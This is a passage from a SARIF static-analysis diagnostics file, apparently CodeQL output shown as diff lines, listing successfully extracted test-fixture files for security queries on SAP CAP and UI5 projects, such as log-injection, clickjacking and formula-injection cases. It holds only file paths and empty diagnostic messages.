"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 103 - } - } - } ], - 
"message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 104 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 105 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 106 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/server.js", 
- "uriBaseId" : "%SRCROOT%", - "index" : 107 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 108 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 109 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 110 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 111 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 112 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 113 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 115 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 116 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/lib/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 117 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 118 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/src/qlpack.yml", - "uriBaseId" : 
"%SRCROOT%", - "index" : 119 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/codeql-pack.lock.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 120 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/BindingStringParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 121 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 123 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - 
"descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.html", - "uriBaseId" : "%SRCROOT%", - "index" : 124 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.json", - "uriBaseId" : "%SRCROOT%", - "index" : 125 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/Bindings/test.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 126 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/lib/JsonParser/test.js", - "uriBaseId" : "%SRCROOT%", - "index" : 127 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - 
"formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/attachDisplay_detachDisplay/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 128 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/binding1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 129 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/binding_path/bindingComposite.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 130 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/property_getter_setter/webapp/view/App.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 131 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - 
"locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/sink/sink1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 132 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/source/source1.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 133 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/models/multiple_models/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 134 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/qlpack.yml", - "uriBaseId" : "%SRCROOT%", - "index" : 135 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 137 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 139 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 140 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-deny-all/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 141 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 142 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 143 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 144 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 145 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 146 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 147 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - 
"properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 148 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 149 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 151 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 152 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 153 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - } - } - } ], - 
"message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 156 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 157 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 158 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 160 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 161 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 162 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 163 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 164 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 165 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - 